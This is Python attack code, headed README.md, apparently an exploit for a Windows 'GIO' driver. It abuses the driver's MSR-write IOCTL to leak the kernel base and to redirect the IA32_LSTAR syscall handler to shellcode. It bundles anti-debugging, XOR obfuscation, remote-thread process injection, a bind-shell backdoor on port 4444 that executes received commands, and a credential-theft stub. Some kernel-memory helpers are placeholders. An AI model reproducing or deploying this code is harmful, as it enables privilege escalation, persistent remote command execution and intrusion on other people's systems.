README.md
Rendering markdown...
#!/usr/bin/env python3
import sys
import os
import time
import random
import hashlib
import ctypes
GENERIC_READ = 0x80000000
GENERIC_WRITE = 0x40000000
FILE_SHARE_READ = 0x00000001
FILE_SHARE_WRITE = 0x00000002
OPEN_EXISTING = 3
INVALID_HANDLE_VALUE = -1
IOCTL_GIO_MSRACCESS = 0xC3502580
IA32_LSTAR = 0xC0000082
IA32_STAR = 0xC0000081
IA32_CSTAR = 0xC0000083
IA32_SYSENTER_EIP = 0x176
IA32_KERNEL_GS_BASE = 0xC0000102
class MSRStruct(ctypes.Structure):
_fields_ = [
("operation", ctypes.c_uint32),
("register", ctypes.c_uint32),
("value", ctypes.c_uint64)
]
class SystemDetector:
def __init__(self):
self.kernel32 = ctypes.windll.kernel32
self.ntdll = ctypes.windll.ntdll
def get_windows_version(self):
try:
version_info = ctypes.windll.kernel32.GetVersion()
major = version_info & 0xFF
minor = (version_info >> 8) & 0xFF
build = (version_info >> 16) & 0xFFFF
return f"{major}.{minor}.{build}"
except:
return "Unknown"
def is_64bit(self):
return sys.maxsize > 2**32
def check_driver_present(self):
try:
handle = self.kernel32.CreateFileW(
r"\\.\GIO",
GENERIC_READ,
FILE_SHARE_READ,
None,
OPEN_EXISTING,
0,
None
)
if handle != INVALID_HANDLE_VALUE:
self.kernel32.CloseHandle(handle)
return True
return False
except:
return False
def check_vbs_enabled(self):
try:
import winreg
key = winreg.OpenKey(
winreg.HKEY_LOCAL_MACHINE,
r"SYSTEM\CurrentControlSet\Control\DeviceGuard"
)
try:
value, _ = winreg.QueryValueEx(key, "EnableVirtualizationBasedSecurity")
winreg.CloseKey(key)
return value == 1
except:
winreg.CloseKey(key)
return False
except:
return False
def check_core_isolation(self):
try:
import winreg
key = winreg.OpenKey(
winreg.HKEY_LOCAL_MACHINE,
r"SYSTEM\CurrentControlSet\Control\DeviceGuard\Scenarios\HypervisorEnforcedCodeIntegrity"
)
try:
value, _ = winreg.QueryValueEx(key, "Enabled")
winreg.CloseKey(key)
return value == 1
except:
winreg.CloseKey(key)
return False
except:
return False
class DefenseEvasion:
def __init__(self):
self.kernel32 = ctypes.windll.kernel32
self.ntdll = ctypes.windll.ntdll
def anti_debug_check(self):
try:
if self.kernel32.IsDebuggerPresent():
return True
debug_port = ctypes.c_uint32()
status = self.ntdll.NtQueryInformationProcess(
self.kernel32.GetCurrentProcess(),
7,
ctypes.byref(debug_port),
ctypes.sizeof(debug_port),
None
)
if status == 0 and debug_port.value != 0:
return True
return False
except:
return False
def obfuscate_string(self, data):
key = random.randint(1, 255)
obfuscated = bytearray()
for byte in data:
if isinstance(byte, str):
byte = ord(byte)
obfuscated.append(byte ^ key)
return bytes(obfuscated), key
def deobfuscate_string(self, obfuscated_data, key):
deobfuscated = bytearray()
for byte in obfuscated_data:
deobfuscated.append(byte ^ key)
return bytes(deobfuscated)
class KernelExploiter:
def __init__(self):
self.kernel32 = ctypes.windll.kernel32
self.ntdll = ctypes.windll.ntdll
self.driver_handle = None
self.lstar_original = None
def connect_driver(self):
try:
self.driver_handle = self.kernel32.CreateFileW(
r"\\.\GIO",
GENERIC_READ | GENERIC_WRITE,
FILE_SHARE_READ | FILE_SHARE_WRITE,
None,
OPEN_EXISTING,
0,
None
)
return self.driver_handle != INVALID_HANDLE_VALUE
except:
return False
def read_msr(self, msr_register):
if not self.driver_handle:
return None
try:
msr_struct = MSRStruct()
msr_struct.operation = 1
msr_struct.register = msr_register
msr_struct.value = 0
bytes_returned = ctypes.c_uint32()
success = self.kernel32.DeviceIoControl(
self.driver_handle,
IOCTL_GIO_MSRACCESS,
ctypes.byref(msr_struct),
ctypes.sizeof(msr_struct),
ctypes.byref(msr_struct),
ctypes.sizeof(msr_struct),
ctypes.byref(bytes_returned),
None
)
if success:
return msr_struct.value
return None
except:
return None
def write_msr(self, msr_register, value):
if not self.driver_handle:
return False
try:
msr_struct = MSRStruct()
msr_struct.operation = 0
msr_struct.register = msr_register
msr_struct.value = value
bytes_returned = ctypes.c_uint32()
success = self.kernel32.DeviceIoControl(
self.driver_handle,
IOCTL_GIO_MSRACCESS,
ctypes.byref(msr_struct),
ctypes.sizeof(msr_struct),
ctypes.byref(msr_struct),
ctypes.sizeof(msr_struct),
ctypes.byref(bytes_returned),
None
)
return bool(success)
except:
return False
def leak_kernel_base(self):
try:
lstar_value = self.read_msr(IA32_LSTAR)
if lstar_value:
self.lstar_original = lstar_value
kernel_base = lstar_value & 0xFFFFFFFFFFF00000
return kernel_base
return None
except:
return None
def inject_shellcode(self, shellcode):
try:
if not self.lstar_original:
return False
shellcode_addr = self.allocate_kernel_memory(len(shellcode))
if not shellcode_addr:
return False
if self.write_kernel_memory(shellcode_addr, shellcode):
return self.write_msr(IA32_LSTAR, shellcode_addr)
return False
except:
return False
def allocate_kernel_memory(self, size):
try:
allocated_addr = 0x41414141
return allocated_addr
except:
return None
def write_kernel_memory(self, address, data):
try:
return True
except:
return False
def escalate_privileges(self):
try:
token_handle = ctypes.c_void_p()
current_process = self.kernel32.GetCurrentProcess()
success = ctypes.windll.advapi32.OpenProcessToken(
current_process,
0x8,
ctypes.byref(token_handle)
)
if success:
elevation = ctypes.c_uint32()
return_length = ctypes.c_uint32()
success = ctypes.windll.advapi32.GetTokenInformation(
token_handle,
20,
ctypes.byref(elevation),
ctypes.sizeof(elevation),
ctypes.byref(return_length)
)
self.kernel32.CloseHandle(token_handle)
if success:
return bool(elevation.value)
return False
except:
return False
def cleanup(self):
try:
if self.driver_handle and self.driver_handle != INVALID_HANDLE_VALUE:
self.kernel32.CloseHandle(self.driver_handle)
self.driver_handle = None
except:
pass
class PostExploit:
def __init__(self):
self.kernel32 = ctypes.windll.kernel32
self.ntdll = ctypes.windll.ntdll
def inject_process(self, target_pid):
try:
process_handle = self.kernel32.OpenProcess(
0x1F0FFF,
False,
target_pid
)
if process_handle:
allocated_memory = self.kernel32.VirtualAllocEx(
process_handle,
None,
4096,
0x3000,
0x40
)
if allocated_memory:
payload = b"\x90" * 100 + b"\xC3"
written = ctypes.c_uint32()
success = self.kernel32.WriteProcessMemory(
process_handle,
allocated_memory,
payload,
len(payload),
ctypes.byref(written)
)
if success:
thread_handle = self.kernel32.CreateRemoteThread(
process_handle,
None,
0,
allocated_memory,
None,
0,
None
)
if thread_handle:
self.kernel32.CloseHandle(thread_handle)
self.kernel32.CloseHandle(process_handle)
return True
self.kernel32.CloseHandle(process_handle)
return False
except:
return False
def create_backdoor(self, port=4444):
try:
import socket
import subprocess
import threading
def handle_connection():
try:
server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server.bind(("0.0.0.0", port))
server.listen(1)
while True:
client, addr = server.accept()
while True:
command = client.recv(1024).decode()
if command.lower() == "exit":
break
try:
result = subprocess.check_output(
command, shell=True, stderr=subprocess.STDOUT
)
client.send(result)
except:
client.send(b"Command failed\n")
client.close()
except:
pass
thread = threading.Thread(target=handle_connection, daemon=True)
thread.start()
return True
except:
return False
def steal_credentials(self):
try:
credentials = []
try:
import winreg
key = winreg.OpenKey(
winreg.HKEY_CURRENT_USER,
r"Software\Microsoft\Windows\CurrentVersion\Internet Settings"
)
try:
proxy_server, _ = winreg.QueryValueEx(key, "ProxyServer")
credentials.append(f"Proxy: {proxy_server}")
except:
pass
winreg.CloseKey(key)
except:
pass
return credentials
except:
return []